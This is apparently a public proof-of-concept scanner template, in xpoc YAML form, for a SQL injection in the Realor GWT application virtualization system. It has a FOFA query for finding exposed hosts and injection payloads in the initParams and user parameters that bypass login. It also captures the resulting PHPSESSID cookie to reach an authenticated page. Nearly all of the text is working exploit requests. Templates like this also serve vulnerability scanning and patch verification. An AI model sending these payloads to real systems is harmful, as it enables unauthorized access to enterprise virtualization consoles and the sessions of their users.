漏洞描述
FOFA: app="REALOR-天翼应用虚拟化系统"
realor-gwt-system-sql-injection: Realor GWT System SQL injection
PoC代码[已公开]
id: realor-gwt-system-sql-injection
info:
name: Realor GWT System SQL injection
author: xpoc
severity: high
verified: true
description: |
FOFA: app="REALOR-天翼应用虚拟化系统"
tags: realor,sqli
created: 2023/06/23
rules:
r0:
request:
method: GET
path: /ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_admin%27-%27__pwd_password123__serverIdStr_1&sign=7627a11bf8f214451e7929f05299b9f6
expression: response.body.bcontains(b"未查询到符合条件的用户")
r1:
request:
method: GET
path: /AgentBoard.XGI?user='||'1&cmd=UserLogin
expression: response.body.bcontains(b"CustomInfo") && response.headers["set-cookie"].contains("PHPSESSID")
output:
search: '"PHPSESSID=(?P<PHPSESSID>.*?);".bsubmatch(response.raw_header)'
PHPSESSID: search["PHPSESSID"]
r2:
request:
method: GET
path: /Board.XGI
headers:
Cookie: PHPSESSID={{PHPSESSID}}
expression: response.body.bcontains(b"src=\"custom/")
expression: r0() || r1() && r2()